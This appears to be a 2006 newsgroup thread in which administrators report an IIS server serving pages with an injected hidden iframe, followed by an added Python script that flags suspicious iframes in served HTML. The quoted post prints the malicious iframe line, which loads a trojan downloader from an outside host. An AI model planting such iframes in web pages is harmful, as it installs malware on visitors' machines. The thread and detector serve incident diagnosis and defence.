| dcote@dgmdata.com 2006-12-09, 1:35 am |
| We had the same problem on our Windows 2003 server today.
We cannot find any information anywhere.
Any ideas???
Paul Oliver wrote:
> Our website was compromised sometime in the last few days, but our
> Antivirus (Symantec Corporate) when run on the server doesn't detect it.
>
> It is a Windows Server 2003 Standard server, running SP1 and all the
> latest patches. IIS sends down a website to the user with IFRAMEs
> injected into the HTML:
>
> <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
> NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
> CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
> width=1 height=1></iframe></TD></A></TR></TABLE></TD>
>
> The iframe code above pointing to xaqjlyswly.biz does not come from our
> code. I looked at the ASP function that generates this link and there
> is nothing there that would put that on the page.
>
> The iframe tries to get the user's browser to download the Downloader
> virus which, according to Symantec "connects to the Internet and
> downloads other Trojan horses".
>
> http://www.symantec.com/security_re...=2002-101518-4323-99
>
> My local antivirus on my machine caught downloader getting installed
> after browsing the site on the infected server.
>
> I used Agent Ransack to look for the string ".biz" across all our
> websites source code. The string wasn't found anywhere.
>
> That all leads me to believe that something is getting injected into the
> code before it is sent to the end user.
>
> I found an older virus that has similar characteristics called
> Download.Ject which infected IIS also. I followed Microsoft's
> suggestions for detecting Download.Ject and we don't have it.
>
> Any ideas?
|
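The comparison the quoted post makes by hand (an iframe in what IIS sends, nothing matching in the source on disk) can be automated. The following is an added example, not part of the thread: it parses a served response and flags iframes that are off-site, declared 0 or 1 pixel in size, or absent from the on-disk source. The function names, host names and sample markup are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeCollector(HTMLParser):
    """Record src, width and height of every <iframe> in a response body."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # the parser lowercases tag and attribute names
            a = dict(attrs)
            self.frames.append((a.get("src") or "", a.get("width"), a.get("height")))

def _tiny(value):
    # A declared size of 0 or 1 pixel makes the frame invisible to the visitor.
    return value is not None and value.strip().rstrip("px") in ("0", "1")

def suspicious_iframes(served_html, site_host, source_text):
    """Flag iframes that are off-site, hidden, or absent from the on-disk source."""
    collector = IframeCollector()
    collector.feed(served_html)
    findings = []
    for src, width, height in collector.frames:
        host = (urlparse(src).hostname or site_host).lower()  # relative URL: same site
        reasons = []
        if host != site_host.lower():
            reasons.append("off-site")
        if _tiny(width) or _tiny(height):
            reasons.append("hidden")
        if src and src not in source_text:
            reasons.append("not-in-source")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings

# Constructed sample: what the page source contains on disk ...
SAMPLE_SOURCE = '<TD><A HREF="news.asp?ID=194"><IMG SRC="images/newsClip.png"></A></TD>'
# ... and what the server actually sent (unquoted attributes, as in the post).
SAMPLE_SERVED = ('<TD><A HREF="news.asp?ID=194"><IMG SRC="images/newsClip.png"></a>'
                 '<iframe src=http://injected.example/x.php width=1 height=1></iframe></TD>')

if __name__ == "__main__":
    for f in suspicious_iframes(SAMPLE_SERVED, "www.site.example", SAMPLE_SOURCE):
        print(f["src"], f["host"], ",".join(f["reasons"]))
```

In practice `served_html` would be the body fetched from the live site and `source_text` the concatenated page source read from the web root, so a "not-in-source" finding points at something modifying the response after the page code runs.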